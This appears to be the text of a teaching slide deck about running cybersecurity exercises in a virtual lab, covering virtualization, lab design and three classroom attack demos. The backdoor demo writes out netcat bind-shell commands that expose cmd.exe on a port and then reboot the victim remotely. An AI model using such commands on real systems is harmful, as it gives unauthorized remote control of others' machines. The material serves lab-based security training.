Cybersecurity Training in a Virtual
Environment
By Chinedum Irrechukwu
Areas to be covered
•
•
•
•
•
•
•
•
Brief introduction to virtualization
General Benefits of virtualization
Dominant vendors and common products
Lab Architecture
Lab technical support
Lab Exercise Demonstration
Summary
Questions
Introduction to Virtualization
• A software entity can have and share access to
underlying hardware resources.
• The software entity can be an application, a network
or a virtual machine.
• Humans can interact with it as if it is a separate
entity (e.g a separate physical machine)
• A software layer exists that allows for the creation
and deployment of virtual machines
General Benefits
• Multiple guest operating systems can exist on one
physical machine
• More productivity and less cost
• Additional energy and real estate cost savings
• Software testing before deployment (patches)
• Fast restore in the event of VM crash or corruption
Dominant Vendors and Common
Products
• Vmware
– VSphere, Esxi, Vcloud Director
• Citrix (Xen)
– Xen is open source
– Citrix version has an excellent management interface
– Alternative choice to the VMware product line
• Linux Kernel Virtual Machine
– High potential but no well developed management
interface
Common Products for Single Users
• Enterprise class virtualization products
– Vmware, Citrix Xen and Linux KVM can
• Create multiple virtual networks
• Allow numerous connections to the servers
• Allow the clustering of servers and provide a good management
interface
• Provide a way to authenticate users
• Common Products for Single users
– Vmware workstation, Vmware player etc
– Oracle Virtualbox
– Virtual PC
Lab Architecture
• Consists of multiple physical servers
• Group of servers is managed by a central server
• Central server should have ability to connect into an
authentication server
• VPN might be needed for security
• Choice between web based connection to VM or IP
based remote connection (RDP or SSH).
Lab Architecture Diagram
http://www.cisco.com/en/US/solutions/collateral/ns340/ns517/ns224/ns668/net_implementation_white_paper0900aecd80534
95a.html
Extra Notes on Lab Architecture
• The number of physical servers should depend on
the number of students and the storage you need
• Cost increases with each additional server you add
• Consider the technical support required for the
system
Lab Support
• Lab may require additional technical support from IT
staff
• Both Instructors and students may need help with
connectivity
• Students may require help with lab exercises
• Consider having IT staff help with this area
• Consider hiring teaching assistants or lab assistants
to help with lab exercises
Potential Technical Issues
• VPN Connectivity
– Installed Firewall on client PCs
– Installed Internet Security (Antivirus)software on client PCs
• User Based Issues
– Inexperienced users
– Incorrectly applied instructions
Attacks
• Online password attack (Windows)
– Attempt to crack a password on a remote system
– Victim will be a windows system
• Backdoor attack
– Insider installed malicious program that allows connections
to be made to victim system
• Trojan attack
– Malicious program that appears harmless but performs
some other action
Online Password Attack (Windows)
• Server Message Block used for file sharing
• SMB clients and servers communicate about shared
resources
http://www.highteck.net/EN/Application/Application_Layer_Functionality_a
nd_Protocols.html
Online Password Attack (Contd)
• Attacker’s Objective
– Retrieve or discover a privileged user’s password
• Attack Method
– Automate a dictionary password attack against a Windows
share
– A custom script can and will be used
• Mitigation/Prevention/Detection
– Apply maximum logon attempts
– Security personnel should review log files
Online Password Attack Contd. (Demo)
• Nmap scan of network
• Enumerate shares of the Windows machines
• Run script that attempts to connect to share with a
privileged account
• Connection attempt will use multiple dictionary
passwords
• Connect to the VM using a terminal application
Online Password Attack on a Windows
(Contd.)
• Learning Objectives
–
–
–
–
Importance of using a complex password
Importance of enforcing maximum logon attempts
Importance of renaming the administrator account
Understanding the effectiveness of social engineering
• Knowing the username is half the battle
• Aha moment!
http://quite-rightly.blogspot.com/2011/07/congress-let-there-be-edison-light-bulb.html
Backdoor Attack
• Attacker’s objective
– Execute remote commands on victim system
• Attack Method
– Insider installs backdoor program on a victim machine
– Backdoor listens for and accepts incoming connections
http://technicaljones.com/index.php?page=91
Backdoor Attack Contd.
• Mitigation/Prevention/Detection
– Physical security reduces the risk
– Anti-virus scans are also effective
http://kyrionhackingtutorials.com/2010/10/what-are-backdoors/
Backdoor Attack Steps
• Install backdoor (netcat) on victim computer
• Configure backdoor to accept incoming connections
– Execute “nc –l –v –p 5555 –e cmd.exe” on server or victim
• Connect to the victim machine
– Execute “nc –vn <IP address> 5555”
• Execute command on remote system from attack
machine
– Execute “shutdown –r –t 20” to shut down and restart the
victim system in 20 seconds
Trojan Attack
• Attacker’s Objective
– Successfully install or execute malware on a victim system
– Trojan installs malware but pretends to be legitimate
software
http://www.buzzle.com/articles/trojan-horse-virus-removal.html
Trojan Attack (Contd.)
• Attack Method
– Malicious web downloads
– Email Attachments
• Mitigation/Prevention/Detection
– Up to date anti-virus definitions
– User training
Take Home Message
• Virtualization is useful for hands-on exercises.
• Provides flexibility to create different lab
environments
• Cost is proportional to the number of students using
the lab
• Lab support is useful and should be considered
• Virtual labs help instructors to achieve learning
objectives and improve experiential learning.
Questions
• Any questions ???
• Email: chinedum.irrechukwu@umuc.edu